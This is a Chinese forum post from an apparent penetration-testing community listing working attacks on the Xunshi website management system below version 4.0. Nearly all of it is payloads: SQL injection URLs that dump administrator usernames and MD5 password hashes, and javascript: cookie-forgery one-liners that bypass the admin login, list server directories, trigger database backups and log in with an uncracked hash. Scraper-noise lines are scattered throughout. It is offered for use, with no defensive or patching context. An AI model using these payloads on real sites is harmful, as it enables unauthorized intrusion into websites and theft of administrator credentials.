中国网络渗透测试联盟
标题:
讯时网站管理系统4.0以下漏洞
[打印本页]
作者:
admin
时间:
2016-5-11 14:55
标题:
讯时网站管理系统4.0以下漏洞
一、注入
% M/ P0 j0 Y. p7 H: P4 |5 F' P$ H$ N
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
& @$ \6 b- X6 S- Z8 y
. f- s: N* \: N, x4 w6 H8 G/ G$ E
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
. D! V2 n# d$ L' p4 L1 H7 ]
第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
: x: S& Y n+ t: U
可得到用户名和MD5加密码的密码。
" x; @9 i% V4 ^9 J! a
3 H8 `" e' Y c( Z1 u/ i9 t4 H& w
二、cookies欺骗
# {. }8 D h2 v9 q% u
9 |3 t7 l& J- ]: ^7 ~/ |
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
) [) [' i7 \4 l
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
9 S3 F8 S0 W; G' P: q/ [
* G6 X. m2 n, J
2、列目录.
' c/ |' \3 Y/ m- _( L
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
3 k" m: }4 q8 s* J) M
) G/ i$ I, B: {1 {6 z
3、数据库备份(适用性好像比较低.)
1 B4 g1 ~! v( E, w1 S/ C8 w
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
. d' c- T2 W, |2 P
' e" {$ h' b& C& Q
4、得到MD5密码解不了密进后台方法
j) Q" H" r) Z3 c, i
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
( Z! G s! C f& k
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2